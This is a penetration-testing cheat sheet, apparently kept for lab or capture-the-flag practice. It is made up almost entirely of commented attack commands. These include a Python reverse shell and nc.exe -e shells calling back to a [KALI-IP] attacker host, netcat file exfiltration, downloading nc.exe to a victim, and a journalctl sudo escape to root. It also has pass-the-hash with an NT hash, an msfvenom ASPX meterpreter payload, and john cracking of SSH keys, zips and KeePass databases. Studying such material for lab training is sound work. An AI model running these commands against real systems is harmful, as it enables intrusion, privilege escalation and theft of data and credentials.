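# Lab target; override before running the rest of the sheet.
ip="10.10.10.5"
# Initial service scan: -Pn skips host discovery (lab boxes often drop ICMP),
# -sC runs the default NSE scripts, -sV probes service versions and -oA keeps
# nmap.{nmap,gnmap,xml} for later grep/import. Quoted so an odd value in $ip
# cannot be word-split into extra targets.
nmap -Pn -sC -sV -oA nmap "$ip"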
https://github.com/theonlykernel/enumeration/wiki
https://medium.com/oscp-cheatsheet/oscp-cheatsheet-6c80b9fa8d7e
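# WordPress enumeration. --disable-tls-checks turns off certificate
# validation: fine for a lab box with a self-signed cert, not for anything
# where a man-in-the-middle matters. $url must be set beforehand.
wpscan --disable-tls-checks --url "$url"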
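# SMB enumeration.
# In msfconsole: use auxiliary/scanner/smb/smb_version (RHOSTS = the target)
# NetBIOS name table of the host
nmblookup -A "$ip"
# List shares; this prompts for a password, add -N to attempt a null session
smbclient -L "$ip"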
wordlist: /usr/share/wordlists/dirb/common.txt
URL pattern to fuzz when the file name is known but its directory is not (fuzz the {dir} component):
/{dir}/phpbash.min.php
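# Directory brute force with the dirb common list. ./gobuster assumes the
# binary sits in the current directory; use plain gobuster if it is on PATH.
./gobuster dir -u "$url" -w /usr/share/wordlists/dirb/common.txt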
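# FTP checks on port 21: anonymous login, FTP bounce, OPIE, the ProFTPD and
# vsftpd backdoor probes and the CVE-2010-4221 (ProFTPD) check. -Pn as for the
# initial scan, -vv to see script output as it arrives.
nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 "$ip"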
## Kali host setup
# German keyboard layout for the current X session
setxkbmap de
# choose the timezone interactively
sudo dpkg-reconfigure tzdata
# locate a file by name anywhere on disk, hiding permission-denied noise
find / -name 'test.py' -print 2>/dev/null
https://unix.stackexchange.com/questions/200637/save-all-the-terminal-output-to-a-file
# Convert RAW Output to TXT
cat $SCRIPT_LOG_FILE | perl -pe 's/\e([^\[\]]|\[.*?[a-zA-Z]|\].*?\a)//g' | col -b > $txtfile
# list NTFS alternate data streams of the files in the current directory (cmd.exe)
dir /R
# print the contents of the root.txt stream attached to hm.txt (PowerShell)
powershell Get-Content -Path "hm.txt" -Stream "root.txt"
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
meterpreter > cd %TEMP%
meterpreter > pwd
C:\Windows\TEMP
meterpreter > background
use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > run
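# Privilege escalation through journalctl's pager (GTFOBins "journalctl").
# Presumably sudo -l allows exactly this command line; sudoers matches the
# arguments literally, so keep them byte-for-byte (-n5 -unostromo.service).
# journalctl hands its output to less: make the terminal window very small
# first so the 5 lines overflow the screen and less stays open, then at the
# less prompt type
#   !/bin/sh
# to get a root shell (whoami -> root). The path was missing its leading
# slash in the original note.
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service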
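# Pass-the-hash over SMB. The first half (aad3b435...) is the well-known
# empty LM hash, the second half is the NT hash. Note the hash is still in
# pth-winexe's argv (visible in ps) and, if typed literally, in shell
# history; set the variable from a file or prompt rather than retyping it.
nthash="e0fb1fb85756c24235ff238cbe81fe00"
pth-winexe -U "$domain/$username%aad3b435b51404eeaad3b435b51404ee:$nthash" "//$ip" cmd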
powershell wget "http://[KALI-IP]/windows-resources/binaries/nc.exe" -outfile nc.exe
nc.exe -e cmd.exe [KALI-IP] 1234
# on Kali, catch the reverse shell (port must match the nc.exe -e call)
nc -lvnp 1234
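# on Kali, receive a file: everything the listener gets is written to disk.
# Plain TCP gives no integrity check, so hash the result and compare it with
# the victim side (certutil -hashfile [FILENAME] SHA256 on Windows).
nc -lp 1235 > [FILENAME]
sha256sum [FILENAME]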
# on the victim (cmd.exe): push the file to the Kali listener; -w 3 gives up after 3 s without data
nc.exe -w 3 [KALI-IP] 1235 <[FILENAME]
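# Python reverse shell for the victim. Replace [KALI-IP] (same placeholder as
# the nc.exe examples) instead of leaving a stale attacker address in the
# sheet, and keep the port in sync with the listener. If the target only has
# python3, call it as python3. The unused assignment was dropped.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[KALI-IP]",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'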
# make shell better: allocate a pty so su/sudo, editors and tab completion work
# afterwards: Ctrl-Z, on Kali `stty raw -echo; fg`, then `export TERM=xterm` in the shell
python -c 'import pty; pty.spawn("/bin/bash");'
# on Kali, listener for the python reverse shell (same port as in the one-liner)
nc -lvnp 1234
# ASPX meterpreter payload calling back to $lab_ip:1234 (start the matching
# multi/handler before uploading)
msfvenom -p windows/meterpreter/reverse_tcp LHOST="$lab_ip" LPORT=1234 -f aspx -o devel.aspx
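# Offline cracking with john. One wordlist path for every job (the Kali
# default location, like the dirb list above) instead of a per-user path and
# a bare rockyou.txt in the cwd. None of this needs root, so no sudo; running
# john as root also leaves ~/.john/john.pot owned by root.
wordlist=/usr/share/wordlists/rockyou.txt
# htpasswd entries can be fed to john directly
john --wordlist="$wordlist" htpasswd.txt
# encrypted SSH private key -> john hash
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist="$wordlist" id_rsa.hash
# password-protected zip
/usr/sbin/zip2john avedb.zip > avedb.zip.hashes
john --wordlist="$wordlist" avedb.zip.hashes
# KeePass database (crack jeeves.hash the same way)
keepass2john jeeves.kdbx > jeeves.hash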